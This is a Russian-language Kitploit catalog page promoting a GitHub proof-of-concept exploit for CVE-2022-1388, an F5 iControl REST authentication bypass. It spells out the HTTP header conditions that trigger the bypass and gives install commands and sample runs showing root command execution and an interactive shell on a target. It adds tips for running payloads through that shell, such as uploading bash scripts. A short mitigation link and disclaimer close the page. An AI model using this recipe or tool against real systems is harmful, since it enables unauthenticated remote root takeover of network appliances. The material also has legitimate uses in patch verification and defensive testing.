Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1388-POC — Улучшенный Proof of Concept для CVE-2022-1388 с интерактивной оболочкой | Kitploit
Инструменты/GitHubGitHub/psychosec2/cve-2022-1388-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubpsychosec2/cve-2022-1388-poc

CVE-2022-1388-POC

Улучшенный Proof of Concept для CVE-2022-1388 с интерактивной оболочкой

Репозиторий
1441 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-1388 Poc by PsychoSec

Улучшенный PoC для CVE-2022-1388, затрагивающий несколько продуктов F5.

Это улучшенная версия Proof of Concept от Horizon3 для CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388

Эта версия содержит множество улучшений, а также интерактивную оболочку для выполнения удалённых команд.

Технический анализ:

Технический анализ первопричины уязвимости от Horizon3 можно найти в их блоге: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

Сводка:

Необходимые условия запроса для эксплуатации этой уязвимости:

  1. Заголовок Connection должен содержать X-F5-Auth-Token
  2. Заголовок X-F5-Auth-Token должен присутствовать
  3. Заголовок Host должен быть localhost / 127.0.0.1, или заголовок Connection должен содержать X-Forwarded-Host
  4. Заголовок Auth должен быть задан с именем пользователя admin и любым паролем

Требования:

  • git
  • pip3
  • python3

Установка:

root@kitploit:~
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -h

Использование:

Проверка цели:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

Use -s option to run an interactive shell.

Интерактивная оболочка:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 

Не требует использования каких-либо обратных TCP-соединений или слушателей.

Параметры:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]

Options:
  -h, --help         Show this help message.
  -u URL, --url=URL  The IP address of the target.
  -t, --test         Test target for CVE-2022-1388.
  -s, --shell        Run an interactive shell.

Важно:

Обратите внимание: при запуске интерактивной оболочки на непропатченной системе некоторые команды и синтаксические конструкции могут не работать или давать неожиданный результат. Это, вероятно, связано с использованием JSON в API-запросах и ответах сервера. Чтобы избежать проблем, при использовании интерактивной оболочки старайтесь не использовать отдельные символы, распространённые в синтаксисе JSON, такие как двоеточия, запятые, фигурные скобки, квадратные скобки и особенно кавычки. Любой JSON-синтаксис внутри команды должен быть корректно структурирован.

Использование любого рода неструктурированного JSON-синтаксиса в команде может привести к некорректному API-запросу к серверу и может оставить вас: без вывода команды, без выполнения каких-либо действий, или это может полностью выбросить вас из python-скрипта. К сожалению, это делает некоторые команды непригодными к использованию. Чтобы обойти эту проблему, вы можете вместо этого написать bash-скрипт, загрузить его на сервер и выполнить его с помощью интерактивной оболочки. Также невозможно сменить каталог с помощью команды 'cd'.

  • Введение в JSON: https://javaee.github.io/tutorial/jsonp001.html

В любом случае вы всё равно должны иметь возможность получить базовый вывод команд. Если вы не получаете вывод команды, это не означает, что команда не была выполнена. Однако вам придётся выяснить это самостоятельно.

Меры защиты:

Обновитесь до последней версии или примените меры защиты, следуя инструкциям из бюллетеня безопасности F5 (F5 Security Advisory)

  • https://support.f5.com/csp/article/K23605346

Отказ от ответственности:

Это программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты и не предназначено для использования при атаках на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент